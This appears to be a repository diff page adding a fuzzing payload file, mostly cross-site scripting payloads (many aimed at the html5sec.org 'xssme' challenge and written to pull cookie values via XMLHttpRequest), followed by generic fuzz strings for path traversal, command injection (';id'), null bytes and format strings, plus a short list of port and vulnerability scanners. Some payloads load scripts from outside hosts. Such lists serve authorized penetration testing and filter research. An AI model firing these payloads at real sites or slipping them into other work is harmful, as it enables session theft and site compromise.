<script>%20location.href%20=%20'data:text/html;base64,PHNjcmlwdD54PW5ldyBYTUxIdHRwUmVxdWVzdCgpO3gub3BlbigiR0VUIiwiaHR0cDovL3hzc21lLmh0bWw1c2VjLm9yZy94c3NtZTIvIix0cnVlKTt4Lm9ubG9hZD1mdW5jdGlvbigpIHsgYWxlcnQoeC5yZXNwb25zZVRleHQubWF0Y2goL2RvY3VtZW50LmNvb2tpZSA9ICcoLio/KScvKVsxXSl9O3guc2VuZChudWxsKTs8L3NjcmlwdD4=';%20</script>
|
||||
<iframe%20src=%22404%22%20onload=%22frames[0].document.write(%26quot;<script>r=new%20XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
|
||||
<iframe%20src=%22404%22%20onload=%22content.frames[0].document.write(%26quot;<script>r=new%20XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
|
||||
<iframe%20src=%22404%22%20onload=%22self.frames[0].document.write(%26quot;<script>r=new%20XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
|
||||
<iframe%20src=%22404%22%20onload=%22top.frames[0].document.write(%26quot;<script>r=new%20XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
|
||||
<script>var%20x%20=%20safe123.onclick;safe123.onclick%20=%20function(event)%20{var%20f%20=%20false;var%20o%20=%20{%20isTrusted:%20true%20};var%20a%20=%20[event,%20o,%20event];var%20get;event.__defineGetter__('type',%20function()%20{get%20=%20arguments.callee.caller.arguments.callee;return%20'click';});var%20_alert%20=%20alert;alert%20=%20function()%20{%20alert%20=%20_alert%20};x.apply(null,%20a);(function()%20{arguments.__defineGetter__('0',%20function()%20{%20return%20a.pop();%20});alert(get());})();};safe123.click();</script>#
|
||||
<iframe%20onload=%22write('<script>'%2Blocation.hash.substr(1)%2B'</script>')%22></iframe>#var%20xhr%20=%20new%20XMLHttpRequest();xhr.open('GET',%20'http://xssme.html5sec.org/xssme2',%20true);xhr.onload%20=%20function()%20{%20alert(xhr.responseText.match(/cookie%20=%20'(.*?)'/)[1])%20};xhr.send();
|
||||
<textarea%20id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie%20=%20'(.*?)'/)[1])</script>
|
||||
<textarea%20id=ta%20onfocus=console.dir(event.currentTarget.ownerDocument.location.href=%26quot;javascript:\%26quot;%26lt;script%26gt;var%2520xhr%2520%253D%2520new%2520XMLHttpRequest()%253Bxhr.open('GET'%252C%2520'http%253A%252F%252Fhtml5sec.org%252Fxssme2'%252C%2520true)%253Bxhr.onload%2520%253D%2520function()%2520%257B%2520alert(xhr.responseText.match(%252Fcookie%2520%253D%2520'(.*%253F)'%252F)%255B1%255D)%2520%257D%253Bxhr.send()%253B%26lt;\/script%26gt;\%26quot;%26quot;)%20autofocus></textarea>
|
||||
<iframe%20onload=%22write('<script>'%2Blocation.hash.substr(1)%2B'</script>')%22></iframe>#var%20xhr%20=%20new%20XMLHttpRequest();xhr.open('GET',%20'http://xssme.html5sec.org/xssme2',%20true);xhr.onload%20=%20function()%20{%20alert(xhr.responseText.match(/cookie%20=%20'(.*?)'/)[1])%20};xhr.send();
|
||||
<textarea%20id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie%20=%20'(.*?)'/)[1])</script>
|
||||
<script>function%20x(window)%20{%20eval(location.hash.substr(1))%20}</script><iframe%20id=iframe%20src=%22javascript:parent.x(window)%22><iframe>#var%20xhr%20=%20new%20window.XMLHttpRequest();xhr.open('GET',%20'http://xssme.html5sec.org/xssme2',%20true);xhr.onload%20=%20function()%20{%20alert(xhr.responseText.match(/cookie%20=%20'(.*?)'/)[1])%20};xhr.send();
|
||||
<textarea%20id=ta%20onfocus=%22write('<script>alert(1)</script>')%22%20autofocus></textarea>
|
||||
<object%20data=%22data:text/html;base64,PHNjcmlwdD4gdmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOyB4aHIub3BlbignR0VUJywgJ2h0dHA6Ly94c3NtZS5odG1sNXNlYy5vcmcveHNzbWUyJywgdHJ1ZSk7IHhoci5vbmxvYWQgPSBmdW5jdGlvbigpIHsgYWxlcnQoeGhyLnJlc3BvbnNlVGV4dC5tYXRjaCgvY29va2llID0gJyguKj8pJy8pWzFdKSB9OyB4aHIuc2VuZCgpOyA8L3NjcmlwdD4=%22>
|
||||
<script>function%20x(window)%20{%20eval(location.hash.substr(1))%20};%20open(%22javascript:opener.x(window)%22)</script>#var%20xhr%20=%20new%20window.XMLHttpRequest();xhr.open('GET',%20'http://xssme.html5sec.org/xssme2',%20true);xhr.onload%20=%20function()%20{%20alert(xhr.responseText.match(/cookie%20=%20'(.*?)'/)[1])%20};xhr.send();
|
||||
%3Cscript%3Exhr=new%20ActiveXObject%28%22Msxml2.XMLHTTP%22%29;xhr.open%28%22GET%22,%22/xssme2%22,true%29;xhr.onreadystatechange=function%28%29{if%28xhr.readyState==4%26%26xhr.status==200%29{alert%28xhr.responseText.match%28/%27%28[^%27]%2b%29/%29[1]%29}};xhr.send%28%29;%3C/script%3E
|
||||
<iframe%20src=`http://xssme.html5sec.org/?xss=<iframe%20onload=%22xhr=new%20XMLHttpRequest();xhr.open('GET','http://html5sec.org/xssme2',true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();%22>`>
|
||||
<a%20target="x"%20href="xssme?xss=%3Cscript%3EaddEventListener%28%22DOMFrameContentLoaded%22,%20function%28e%29%20{e.stopPropagation%28%29;},%20true%29;%3C/script%3E%3Ciframe%20src=%22data:text/html,%253cscript%253eObject.defineProperty%28top,%20%27MyEvent%27,%20{value:%20Object,%20configurable:%20true}%29;function%20y%28%29%20{alert%28top.Safe.get%28%29%29;};event%20=%20new%20Object%28%29;event.type%20=%20%27click%27;event.isTrusted%20=%20true;y%28event%29;%253c/script%253e%22%3E%3C/iframe%3E
|
||||
<a%20target="x"%20href="xssme?xss=<script>var%20cl=Components;var%20fcc=String.fromCharCode;doc=cl.lookupMethod(top,%20fcc(100,111,99,117,109,101,110,116)%20)(%20);cl.lookupMethod(doc,fcc(119,114,105,116,101))(doc.location.hash)</script>#<iframe%20src=data:text/html;base64,PHNjcmlwdD5ldmFsKGF0b2IobmFtZSkpPC9zY3JpcHQ%2b%20name=ZG9jPUNvbXBvbmVudHMubG9va3VwTWV0aG9kKHRvcC50b3AsJ2RvY3VtZW50JykoKTt2YXIgZmlyZU9uVGhpcyA9ICBkb2MuZ2V0RWxlbWVudEJ5SWQoJ3NhZmUxMjMnKTt2YXIgZXZPYmogPSBkb2N1bWVudC5jcmVhdGVFdmVudCgnTW91c2VFdmVudHMnKTtldk9iai5pbml0TW91c2VFdmVudCggJ2NsaWNrJywgdHJ1ZSwgdHJ1ZSwgd2luZG93LCAxLCAxMiwgMzQ1LCA3LCAyMjAsIGZhbHNlLCBmYWxzZSwgdHJ1ZSwgZmFsc2UsIDAsIG51bGwgKTtldk9iai5fX2RlZmluZUdldHRlcl9fKCdpc1RydXN0ZWQnLGZ1bmN0aW9uKCl7cmV0dXJuIHRydWV9KTtmdW5jdGlvbiB4eChjKXtyZXR1cm4gdG9wLlNhZmUuZ2V0KCl9O2FsZXJ0KHh4KGV2T2JqKSk></iframe>
|
||||
<a%20target="x"%20href="xssme?xss=<script>find('cookie');%20var%20doc%20=%20getSelection().getRangeAt(0).startContainer.ownerDocument;%20console.log(doc);%20var%20xpe%20=%20new%20XPathEvaluator();%20var%20nsResolver%20=%20xpe.createNSResolver(doc);%20var%20result%20=%20xpe.evaluate('//script/text()',%20doc,%20nsResolver,%200,%20null);%20alert(result.iterateNext().data.match(/cookie%20=%20'(.*?)'/)[1])</script>
|
||||
<a%20target="x"%20href="xssme?xss=<script>function%20x(window)%20{%20eval(location.hash.substr(1))%20}</script><iframe%20src=%22javascript:parent.x(window);%22></iframe>#var%20xhr%20=%20new%20window.XMLHttpRequest();xhr.open('GET',%20'.',%20true);xhr.onload%20=%20function()%20{%20alert(xhr.responseText.match(/cookie%20=%20'(.*?)'/)[1])%20};xhr.send();
|
||||
Garethy%20Salty%20Method!<script>alert(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(this,'window')(),'document')(),%20'getElementsByTagName')('html')[0],'innerHTML')().match(/d.*'/));</script>
|
||||
<a%20href="javascript:\u0061le%72t(1)"><button>
|
||||
<div%20onmouseover='alert(1)'>DIV</div>
|
||||
<iframe%20style="position:absolute;top:0;left:0;width:100%;height:100%"%20onmouseover="prompt(1)">
|
||||
<a%20href="jAvAsCrIpT:alert(1)">X</a>
|
||||
<embed%20src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">%20?
|
||||
<object%20data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">?
|
||||
<var%20onmouseover="prompt(1)">On%20Mouse%20Over</var>?
|
||||
<a%20href=javascript:alert(document.cookie)>Click%20Here</a>
|
||||
<img%20src="/"%20=_="%20title="onerror='prompt(1)'">
|
||||
<%<!--'%><script>alert(1);</script%20-->
|
||||
<script%20src="data:text/javascript,alert(1)"></script>
|
||||
<iframe/src%20\/\/onload%20=%20prompt(1)
|
||||
<iframe/onreadystatechange=alert(1)
|
||||
<svg/onload=alert(1)
|
||||
<input%20value=<><iframe/src=javascript:confirm(1)
|
||||
<input%20type="text"%20value=``<div/onmouseover='alert(1)'>X</div>
|
||||
http://www.<script>alert(1)</script%20.com
|
||||
<iframe%20%20src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															%28
																1
																	%29></iframe>%20?
|
||||
<svg><script%20?>alert(1)
|
||||
<iframe%20%20src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe>
|
||||
<img%20src=`xx:xx`onerror=alert(1)>
|
||||
<object%20type="text/x-scriptlet"%20data="http://jsfiddle.net/XLE63/%20"></object>
|
||||
<meta%20http-equiv="refresh"%20content="0;javascript:alert(1)"/>?
|
||||
<math><a%20xlink:href="//jsfiddle.net/t846h/">click
|
||||
<embed%20code="http://businessinfo.co.uk/labs/xss/xss.swf"%20allowscriptaccess=always>?
|
||||
<svg%20contentScriptType=text/vbs><script>MsgBox+1
|
||||
<a%20href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a
|
||||
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061')%20worksinIE>
|
||||
<script>~'\u0061'%20;%20%20\u0074\u0068\u0072\u006F\u0077%20~%20\u0074\u0068\u0069\u0073.%20%20\u0061\u006C\u0065\u0072\u0074(~'\u0061')</script%20U+
|
||||
<script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script%20a=\u0061%20&%20/=%2F
|
||||
<script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script%20????????????
|
||||
<object%20data=javascript:\u0061le%72t(1)>
|
||||
<script>+-+-1-+-+alert(1)</script>
|
||||
<body/onload=<!-->
alert(1)>
|
||||
<script%20itworksinallbrowsers>/*<script*%20*/alert(1)</script%20?
|
||||
<img%20src%20?itworksonchrome?\/onerror%20=%20alert(1)???
|
||||
<svg><script>//
confirm(1);</script%20</svg>
|
||||
<svg><script%20onlypossibleinopera:-)>%20alert(1)
|
||||
<a%20aa%20aaa%20aaaa%20aaaaa%20aaaaaa%20aaaaaaa%20aaaaaaaa%20%20aaaaaaaaa%20aaaaaaaaaa%20%20href=javascript:alert(1)>ClickMe
|
||||
<script%20x>%20alert(1)%20</script%201=2
|
||||
<div/onmouseover='alert(1)'>%20style="x:">
|
||||
<--`<img/src=`%20onerror=alert(1)>%20--!>
|
||||
<script/src=data:text/javascript,alert(1)></script>%20?
|
||||
<div%20%20style="position:absolute;top:0;left:0;width:100%;height:100%"%20%20onmouseover="prompt(1)"%20onclick="alert(1)">x</button>?
|
||||
"><img%20src=x%20onerror=window.open('https://www.google.com/');>
|
||||
<form><button%20formaction=javascript:alert(1)>CLICKME
|
||||
<math><a%20xlink:href="//jsfiddle.net/t846h/">click
|
||||
<object%20data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>?
|
||||
<iframe%20%20src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
|
||||
<a%20%20href="data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click%20%20Me</a>
|
||||
"><img%20src=x%20onerror=prompt(1);>
|
||||
!'
|
||||
!@#$%%^#$%#$@#$%$$@#$%^^**(()
|
||||
!@#0%^#0##018387@#0^^**(()
|
||||
"><script>"
|
||||
">xxx<P>yyy
|
||||
"\t"
|
||||
#
|
||||
#'
|
||||
#'
|
||||
#xA
|
||||
#xA#xD
|
||||
#xD
|
||||
#xD#xA
|
||||
$NULL
|
||||
$null
|
||||
%
|
||||
%00
|
||||
%00/
|
||||
%01%02%03%04%0a%0d%0aADSF
|
||||
%0a
|
||||
%20
|
||||
%20|
|
||||
%2500
|
||||
%250a
|
||||
%2A
|
||||
%2C
|
||||
%2e%2e%2f
|
||||
%3C%3F
|
||||
%5C
|
||||
%5C/
|
||||
%60
|
||||
%7C
|
||||
|
||||
|
||||
|
||||
|
||||
'
|
||||
";id"
|
||||
(')
|
||||
*
|
||||
*'
|
||||
*'
|
||||
*|
|
||||
+%00
|
||||
-
|
||||
--
|
||||
-1
|
||||
-1.0
|
||||
-2
|
||||
-20
|
||||
-268435455
|
||||
..%%35%63
|
||||
..%%35c
|
||||
..%25%35%63
|
||||
..%255c
|
||||
..%5c
|
||||
..%bg%qf
|
||||
..%c0%af
|
||||
..%u2215
|
||||
..%u2216
|
||||
../
|
||||
..\
|
||||
/
|
||||
/%00/
|
||||
/%2A
|
||||
/'
|
||||
/'
|
||||
0
|
||||
00
|
||||
0xfffffff
|
||||
1
|
||||
1.0
|
||||
2
|
||||
2147483647
|
||||
268435455
|
||||
65536
|
||||
;
|
||||
<%20%20script%20>%20<%20/%20script>
|
||||
<?
|
||||
?x=
|
||||
?x="
|
||||
?x=>
|
||||
?x=|
|
||||
@'
|
||||
@'
|
||||
A
|
||||
ABCD|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|
|
||||
FALSE
|
||||
NULL
|
||||
TRUE
|
||||
[']
|
||||
[']
|
||||
\
|
||||
\"blah
|
||||
\'
|
||||
\'
|
||||
\0
|
||||
\00
|
||||
\00\00
|
||||
\00\00\00
|
||||
\0\0
|
||||
\0\0\0
|
||||
\\
|
||||
\\/
|
||||
\\\\*
|
||||
\\\\?\\
|
||||
\t
|
||||
^'
|
||||
^'
|
||||
`
|
||||
id%00
|
||||
id%00|
|
||||
null
|
||||
something%00html
|
||||
{'}
|
||||
{'}
|
||||
|
|
||||
}
|
18
src/target_list
Normal file
18
src/target_list
Normal file
@ -0,0 +1,18 @@
|
||||
|
||||
Port scanners:
|
||||
|
||||
Nmap
|
||||
Angry IP Scanner
|
||||
Superscan
|
||||
NetScanTools
|
||||
Unicornscan
|
||||
|
||||
Vuln. scanners:
|
||||
|
||||
Carrier
|
||||
Nessus
|
||||
Metasploit pro
|
||||
Acunetix
|
||||
Appscan
|
||||
Netsparker
|
||||
Grendel Scan
|
Loading…
Reference in New Issue
Block a user